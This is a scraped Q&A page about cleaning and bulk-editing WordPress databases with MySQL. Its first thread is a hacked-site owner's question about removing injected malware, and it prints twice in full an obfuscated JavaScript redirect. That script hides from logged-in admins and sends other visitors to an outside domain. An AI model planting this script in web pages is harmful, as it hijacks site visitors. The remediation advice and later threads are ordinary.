Remove script injected into wordpress database - sql

My website got hacked and is now redirecting all new visitors to a shitty website.
I changed all passwords I can think of, installed Wordfence (I'm on wordpress), removed all malicious code from files.
Now I am left with close to 5000 posts in wp_posts table that still contain the same malicious code.
Namely this:
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
I tried
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>", " ")
But I get #1064 - Something is wrong in your syntax near'"<script>var _0x2cf4=['MSIE)' in line 1
Thanks for any help.

Thanks to #B. Go I came up with:
UPDATE wp_posts
SET
post_content = REGEXP_REPLACE(post_content,"<script>var _0x2cf4=.*</script>"," ")
WHERE
post_content RLIKE "<script>var _0x2cf4=.*</script>"
Still can't rid of malicious code on one page, but it doesn't seem to be in the DB.

if the malicious code exist in every post, you might need to check your head and footer file which appear in every post and also core js files that could contain malicious code.
Also check if any external js being called when loading page.
If you can ssh to your file, you can grep -nr "var _0x2cf4=" to target the files.
Hope it helps, thanks

Please, read this answer from one good guy:
https://wordpress.stackexchange.com/questions/357465/removing-malware-appended-to-each-post/358141#358141
Hope this helps

Using REGXP function in mysql
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content,'<script type="text/javascript">.*</script>'," ") WHERE post_content REGEXP('<script type="text/javascript">.*</script>')

Related

Moved site , all links got corrupted, need correct SQL query to fix

Wordpress. from litespeed to ngix server.
All of my links to plugins, images CSS and scripts added "%20" on the end. Example:
https://example.com%20/wp-content/plugins/wp-maintenance-mode/assets/css/style.min.css?
I assume the solution would be to change all "example.com%20" to "example.com" in the database. What would be the correct query to put in phpmyadmin?
I assume the solution would be to change all "example%20" to "example" in the database.
You can use replace():
update t
set link = replace(link, 'example%20', 'example')
where link like '%example$%20%' escape '$';
You have to be a little careful if 'example%20' were ever in the data before the change (i.e. is correct). However, that is unlikely in this case.
Found the solution, was a trailing space in wp-config.

SQL search and replace advanced

Usually when I search and replace I use this code:
UPDATE wp_posts SET post_content = REPLACE (post_content, 'old string', 'new string');
Now I'd like to replace <h1>Title</h1>with <table>...<h1>Title</h1>...</table>
Problem is of course that the text in between tags is different for all pages (it is a wordpress homepage).
Any ideas on how to solve this? Is it possible?
try this its update your column and add text to all of your record
UPDATE wp_posts SET post_content = `<table>`+ post_content+`</table>` ;
If all you need is to put the <table>...</table> tags at the beginning and end, then use Anant Dabhi's solution. However, if you need to do anything smarter than that, SQL is really not the right tool for the job.
The problems with simplistic processing of HTML are many:
What if the tag you are looking for exists within a comment?
What if the <h1> tag has attributes inside it?
What if there is more than one <h1>...</h1> within a post?
The potential problems go on and on.
Since you are using WordPress, why not use PHP, which gives you access to real HTML parsers?
This discussion can get you started:
How do you parse and process HTML/XML in PHP?
this two update statement can help you to do
UPDATE wp_posts
SET post_content = REPLACE (post_content, '<h1>', '<table><h1>');
UPDATE wp_posts
SET post_content = REPLACE (post_content, '</h1>', '</table></h1>');

help to get rid of HTML special chars in database

I've migrated my site from interspire CMS to Joomla! CMS.
I've managed to migrate all the database of articles, but some of them have a weird issue - when I access the page from joomla, the title contains HTML entities like ’.
As you can guess from the CMS's I use, I rely on PHP as my server side, and MySql for my database.
I tried to go over the titles of the articles in the database with htmlspecialchars_decode AND html_entity_decode in order to get rid of those, but it had no effect.
if I just grab an example from the DB and echo it, it will look OK:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
if I go to the article page in joomla it will look like this:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
When I go to PhpMyAdmin to see directly what is in the database, this is the contents of the title:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
I even tried to remove the symbol with:
str_replace("’","",$title);
or replace it like this
str_replace('’',"'",$title);
but nothing.
When I tried to encode it again instead of decoding it (just to see if i'm on the right DB) it worked and encoded it again...
Please, I would be glad to have any new ideas...
Thanks,
Yanipan
Try setting encoding to cp1252. This worked out for me:
$decoded = html_entity_decode($your_string, ENT_QUOTES, 'cp1252');
Probably your best bet is to do search and replace within the database itself vs trying to do it with php. Search and replace in mysql is done like this:
update TABLE_NAME set FIELD_NAME = replace(FIELD_NAME, ‘find this string’, ‘replace found string with this string’);
So yours should look something like:
update ARTICLES set TITLE = replace(TITLE, '’', '\'');
Give that a shot.
Need more info
What is the character encoding on your database? That & or ;, may be something other than the typical ASCII.
It's possible that PHP/Joomla is double-encoding your string. Look at the browser's page source and find the text in the produced HTML. Instead of What’s, it might just be one of the following:
What&rsquo&59;s
What&38;rsquo&59;s
What&rsquo;s

Need to add LF to thousands of MySQL MEDIUMTEXT fields

I need to add a \n or LF or ASCII(x'0A') or however you want to encode it to the end of several thousand MySQL MEDIUMTEXT fields. I tried
update wp_posts set post_content = concat(post_content,ASCII(x'0A'));
but nothing is modified in the field as far as I can see. I suspect this is a limitation of MEDIUMTEXT/LONGTEXT fields, but it would be nice if MySQL would throw an error instead of saying it did something and doing nothing.
If I can't do it with update/concat, what other options do I have? Does someone have a chunk of php code I can use to do it in a loop?
Thanks for any input! I'm trying to get my wordpress site to validate with W3C, and I need the newlines so wordpress does not add a <p> tag inappropriately. Strange, I know.
I don't know where my brain was. I was using HeidiSQL as the interface to MySQL, and wasn't seeing the change in the database. But it did change, which I saw once I refreshed the table data. Sorry for the false question!
Try:
update wp_posts set post_content = concat(post_content,'\n');
I tested with a mediumtext field here and worked..

MySQL: Replace substring if string ends in jpg, gif or png

I'm doing a favor for a friend, getting him off of Blogger and onto a hosted WordPress blog.
The big problem is, with over 1,800 posts, there are a lot of image links to deal with. WordPress has no mechanism to import these automatically, so I'm doing it manually.
I've used wget to download every single image that has ever been linked/embedded on the site. Now I need some help building a MySQL query to change all of the images in the blog to their new address.
For example:
http://www.externaldomain.com/some/link/to/an/image.jpg
Ought to become:
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/www.externaldomain.com/some/link/to/an/image.jpg
So the condition is, if a string in post_content ends in jpeg, jpg, gif or png, replace:
http://
with
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/
I know how to do a blanket replace with
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
But I'm having a hard time figuring out how to accomplish my more nuanced, conditional approach.
Thanks for any guidance you can offer. (Torn between posting here or ServerFault but SO looks like it has plenty of MySQL gurus, so here I am.)
MySQL has a great selection of string manipulation functions that you can plug into your query's WHERE section.
UPDATE wp_posts
SET post_content = REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com')
WHERE RIGHT(post_content, 4) = 'jpeg'
OR RIGHT(post_content, 3) IN ('jpg', 'gif', 'png');
If it were me, though, I'd do two additional things: convert it to lowercase to match e.g. '.JPG', and match the dot before jpg, gif, etc.:
WHERE LOWER(RIGHT(post_content, 5)) = '.jpeg'
OR LOWER(RIGHT(post_content, 4)) IN ('.jpg', '.gif', '.png');
REPLACE will only perform an alteration if the old substring is found - I don't see the concern.
REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
...will work. If you want to limit the updates to rows containing "jpeg", "jpg", "gif" and/or "png", add:
WHERE INSTR(post_content, 'jpeg') > 0
OR INSTR(post_content, 'jpg') > 0
OR INSTR(post_content, 'gif') > 0
OR INSTR(post_content, 'png') > 0
References:
REPLACE
INSTR
If everything fails, what about using the import feature? Then use a plugin to get your images as well (check for the comments in the plugin post since there are some relevant information).
I don't think it can be done in a simple query, but it's relatively easy to do with a simple php script. just have a simple loop in php to go over every single row with content and do a preg_replace on the content field, then update that single row.
It's not nearly as elegant as doing it in sql, but its sure to get the job done today as oposed to sometime this year.
P.S. this is assuming there is more content than just the URL, in which case normal mysql string functions would suffice.